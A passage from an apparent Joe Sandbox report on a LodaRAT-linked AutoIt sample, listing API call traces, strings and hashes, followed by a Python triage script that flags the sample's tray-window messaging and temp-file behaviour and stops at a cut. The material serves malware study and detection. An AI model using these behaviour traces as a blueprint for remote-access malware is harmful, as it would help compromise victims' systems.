• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: Window$DestroyMove
• String ID: static
• API String ID: 2139405536-2160076837
• Opcode ID: c5e48d6238540a9cce8223150ad156e8768ffd204d352d401e2135334bcaf9c5
• Instruction ID: cf8f43a25b64e388d122a969578365e49de51ef6e487ad597f0b4500bc2eb912
• Opcode Fuzzy Hash: c5e48d6238540a9cce8223150ad156e8768ffd204d352d401e2135334bcaf9c5
• Instruction Fuzzy Hash: 1931AF31500604AEEB109F64DC81FFB77A9FF58764F10861AF9A9C7290CB31AD91DB64

APIs
• _memset.LIBCMT ref: 001B5BE4
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 001B5C1F
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
• Opcode ID: 0408c7746b2858682fceaa342ae9a9c6669f26a3bc5bebf9f749709c35f31a4d
• Instruction ID: 0cb7d40b49385b24182a65eaa09e42143888ff94e285d9f75f0501bed0a4b0bc
• Opcode Fuzzy Hash: 0408c7746b2858682fceaa342ae9a9c6669f26a3bc5bebf9f749709c35f31a4d
• Instruction Fuzzy Hash: 1131A531600709ABEB25CF98D985BEDBFFBEF05354F280019E985971A0D7B09A44CF10
                                                                                                                              APIs
                                                                                                                              • __snwprintf.LIBCMT ref: 001C6BDD
                                                                                                                                • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __snwprintf_memmove
                                                                                                                              • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                              • API String ID: 3506404897-2584243854
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 001D9269
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001D9274
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
APIs
  • Part of subcall function 0018C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0018C657
  • Part of subcall function 0018C619: GetStockObject.GDI32(00000011), ref: 0018C66B
  • Part of subcall function 0018C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0018C675
• GetWindowRect.USER32(00000000,?), ref: 001D9775
• GetSysColor.USER32(00000012), ref: 001D978F
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• API String ID: 1983116058-2160076837
APIs
• GetWindowTextLengthW.USER32(00000000), ref: 001D94A6
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 001D94B5
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
APIs
• _memset.LIBCMT ref: 001B5CF3
• GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 001B5D12
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 001C544C
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 001C5475
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• API String ID: 942729171-4266983199
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 001A4557
• ___raise_securityfailure.LIBCMT ref: 001A463E
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: FeaturePresentProcessor___raise_securityfailure
• String ID: (#
• API String ID: 3761405300-3738616181
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: htonsinet_addr
• String ID: 255.255.255.255
• API String ID: 3832099526-2422070025
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
                                                                                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 001AC5E5
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend_memmove
                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                              • API String ID: 1456604079-1403004172
                                                                                                                              • Opcode ID: d538adfb4bc9a3e4231290263eeb0a87d33e229765a699e3c82908fbbcedb8ea
                                                                                                                              • Instruction ID: 2a5a7932a645ba978bc2a153fead51fe43958167964732a5cdc606693eff9a93
                                                                                                                              • Opcode Fuzzy Hash: d538adfb4bc9a3e4231290263eeb0a87d33e229765a699e3c82908fbbcedb8ea
                                                                                                                              • Instruction Fuzzy Hash: DF01F575601218ABCB08EBA8CC529FE33AAAF17310B144618F422E72C1DB3068088790
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __fread_nolock_memmove
                                                                                                                              • String ID: EA06
                                                                                                                              • API String ID: 1988441806-3962188686
                                                                                                                              • Opcode ID: 3559a99bd91336dece1a8499f220aa511c82e4d52d66451040f8275962b3eb18
                                                                                                                              • Instruction ID: 7b925e893a3a08ac07f4208cb3544d22490abd815b2e6a5297dfbe93167b9641
                                                                                                                              • Opcode Fuzzy Hash: 3559a99bd91336dece1a8499f220aa511c82e4d52d66451040f8275962b3eb18
                                                                                                                              • Instruction Fuzzy Hash: AA01F5729002187FDB28D7A8C856EFE7BF89B15311F00415AE193D2181E6B4A7088B60
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
                                                                                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 001AC4E1
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend_memmove
                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                              • API String ID: 1456604079-1403004172
                                                                                                                              • Opcode ID: 0bc6c9a9df3b26a1348d853181e14267c4e1a33d552b49cbac2ab1440a6ec7c2
                                                                                                                              • Instruction ID: 0f25b857e71e030bfce06a2c36f5e9dc77f868779ca32a55086a6c420e592c25
                                                                                                                              • Opcode Fuzzy Hash: 0bc6c9a9df3b26a1348d853181e14267c4e1a33d552b49cbac2ab1440a6ec7c2
                                                                                                                              • Instruction Fuzzy Hash: 66018F75641108BBCB09EBA4C963AFF73AD9F2A701F144029E502E31C1EB545E0896A5
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
                                                                                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 001AC562
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend_memmove
                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                              • API String ID: 1456604079-1403004172
                                                                                                                              • Opcode ID: eebb7af6bbc5f306b0bf05564c3296221f057b699813ac5d7c1d5020956e678b
                                                                                                                              • Instruction ID: 4777675bc6d72959d2b8502a8cd659590f46a3d629be61cb88d352e40e9544c2
                                                                                                                              • Opcode Fuzzy Hash: eebb7af6bbc5f306b0bf05564c3296221f057b699813ac5d7c1d5020956e678b
                                                                                                                              • Instruction Fuzzy Hash: E401AD75A41108BBCB05EBA8C952EFF73ADAF26701F144025F407F3181EB65AE0996A1
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ClassName_wcscmp
                                                                                                                              • String ID: #32770
                                                                                                                              • API String ID: 2292705959-463685578
                                                                                                                              • Opcode ID: 8dcbd4f08e20eaafa4f74fa8d9a0438d4f530e0ec450cf64d9bcd4b886fe0ab4
                                                                                                                              • Instruction ID: d3184c6de832652dc6803985c8c5836a9af111ba2f13e0a0303d38ddcb117e9f
                                                                                                                              • Opcode Fuzzy Hash: 8dcbd4f08e20eaafa4f74fa8d9a0438d4f530e0ec450cf64d9bcd4b886fe0ab4
                                                                                                                              • Instruction Fuzzy Hash: 9CE0D83360022937D720EBA5AC0AEE7FBADFB51BA4F000026F914E3041DB749645C7D4
                                                                                                                              APIs
                                                                                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 001AB36B
                                                                                                                                • Part of subcall function 00192011: _doexit.LIBCMT ref: 0019201B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Message_doexit
                                                                                                                              • String ID: AutoIt$Error allocating memory.
                                                                                                                              • API String ID: 1993061046-4017498283
                                                                                                                              • Opcode ID: 46d443c6e6c64ddf9acde47e0867dc8668f3f6207ad3d6708de109f3630bff04
                                                                                                                              • Instruction ID: fab7f216a45dbe46809146f001dbea992dabc08e86ab596f4096a9e133a07bd5
                                                                                                                              • Opcode Fuzzy Hash: 46d443c6e6c64ddf9acde47e0867dc8668f3f6207ad3d6708de109f3630bff04
                                                                                                                              • Instruction Fuzzy Hash: E6D05B3138935833D61536E47C17FD576885F16B51F154025FF0C955C38BD2D5D091D9
                                                                                                                              APIs
                                                                                                                              • GetSystemDirectoryW.KERNEL32(?), ref: 001EBAB8
                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 001EBCAB
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DirectoryFreeLibrarySystem
                                                                                                                              • String ID: WIN_XPe
                                                                                                                              • API String ID: 510247158-3257408948
                                                                                                                              • Opcode ID: 99ef01522306b8e821f47802f3824d8a3be6cd3cae8ccba3666f18cdb270a6a8
                                                                                                                              • Instruction ID: b130ec10f7c863ca5b32b33e321249366fc8b216c2b0ad0cc06a0386883ae9b0
                                                                                                                              • Opcode Fuzzy Hash: 99ef01522306b8e821f47802f3824d8a3be6cd3cae8ccba3666f18cdb270a6a8
                                                                                                                              • Instruction Fuzzy Hash: 82E0C970C0854DEFCF19DBA9E8CAAEDB7B9BB58300F158896E022B3050C7719A44DF21
                                                                                                                              APIs
                                                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001D849F
                                                                                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 001D84B2
                                                                                                                                • Part of subcall function 001B8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 001B83CD
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                                                              • String ID: Shell_TrayWnd
                                                                                                                              • API String ID: 529655941-2988720461
                                                                                                                              • Opcode ID: 778cf1de034c3ffbb96d92563133918022ebb631b27c72d96ccf48b5b406918f
                                                                                                                              • Instruction ID: 4d27195a3d3a425eeafb2c5ea0813008fe77851ff615bf1e871cc79f38ed57c5
                                                                                                                              • Opcode Fuzzy Hash: 778cf1de034c3ffbb96d92563133918022ebb631b27c72d96ccf48b5b406918f
                                                                                                                              • Instruction Fuzzy Hash: 77D0C972394314B7E764A770AC4BFF66A59AB24B11F050929B349AA5D0CAA4B840C664
                                                                                                                              APIs
                                                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001D84DF
                                                                                                                              • PostMessageW.USER32(00000000), ref: 001D84E6
                                                                                                                                • Part of subcall function 001B8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 001B83CD
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                                                              • String ID: Shell_TrayWnd
                                                                                                                              • API String ID: 529655941-2988720461
                                                                                                                              • Opcode ID: 47d80bd2e68ad23322fbb6a1432fbd945e97112a65b31d04800ac370a3f2c0e8
                                                                                                                              • Instruction ID: 039f07be4ecdc685b988010cacb4ef25f4cdbe57e2ccaf39566bbc78a65be112
                                                                                                                              • Opcode Fuzzy Hash: 47d80bd2e68ad23322fbb6a1432fbd945e97112a65b31d04800ac370a3f2c0e8
                                                                                                                              • Instruction Fuzzy Hash: E6D0A9323803107BE720A370AC0BFE66648AB28B11F000928B309AA1D0CAA0B800C624
                                                                                                                              APIs
                                                                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 001BD01E
                                                                                                                              • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 001BD035
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Temp$FileNamePath
                                                                                                                              • String ID: aut
                                                                                                                              • API String ID: 3285503233-3010740371
                                                                                                                              • Opcode ID: f781b5f02faa7251ab1abba640025bcf13c239cb1cb39ab543ccb35c019b2ef3
                                                                                                                              • Instruction ID: ea0f019b8f027b4aa73e3a2c6861c525891fa131d9ad932bafdd6afc793eea94
                                                                                                                              • Opcode Fuzzy Hash: f781b5f02faa7251ab1abba640025bcf13c239cb1cb39ab543ccb35c019b2ef3
                                                                                                                              • Instruction Fuzzy Hash: 41D05EB154030EBBDB10ABA0FD0EFB9776CA700704F1041907614D10D1D6B4D695CBA0
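The three function blocks above only list raw API traces in Joe Sandbox's `Name.MODULE(args), ref: address` form. The following Python is an added example, not part of the Joe Sandbox report or of the sample's own code: it parses that line format and runs two triage rules over it. The first pairs a `FindWindowW` on the `Shell_TrayWnd` class with the `PostMessageW` that follows it and, where the trace resolved the message id, names it (0x111 is the documented `WM_COMMAND` value, as recorded in the first block). The second flags `GetTempFileNameW` called with the prefix `aut`, the temp-file naming the AutoIt runtime uses, which is consistent with the LodaRAT verdict since LodaRAT is an AutoIt-based RAT. The sample trace is constructed from the APIs lines of these three blocks; the rule names, the `ApiCall` type and the helper functions are this example's own. Note the caveat the second block forces: its `PostMessageW` has only the window-handle argument recorded, so the rule reports the message id as unresolved rather than assuming `WM_COMMAND` there. The meaning of the `wParam` 0x197 is not stated by the report and the example does not interpret it.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed input: the "APIs" lines of the three function blocks above,
# copied into a string so the example runs offline against the report's own format.
SAMPLE_TRACE = """\
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001D849F
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 001D84B2
  • Part of subcall function 001B8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 001B83CD
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001D84DF
• PostMessageW.USER32(00000000), ref: 001D84E6
  • Part of subcall function 001B8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 001B83CD
• GetTempPathW.KERNEL32(00000104,?), ref: 001BD01E
• GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 001BD035
"""

WM_COMMAND = 0x0111  # documented Windows message id; the value recorded in the first PostMessageW

# One call line: Name.MODULE(arg,arg,...), ref: hexaddr. A search (not a match)
# is used so the "Part of subcall function ..." prefix does not prevent a hit.
CALL_RE = re.compile(r"(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)")


@dataclass
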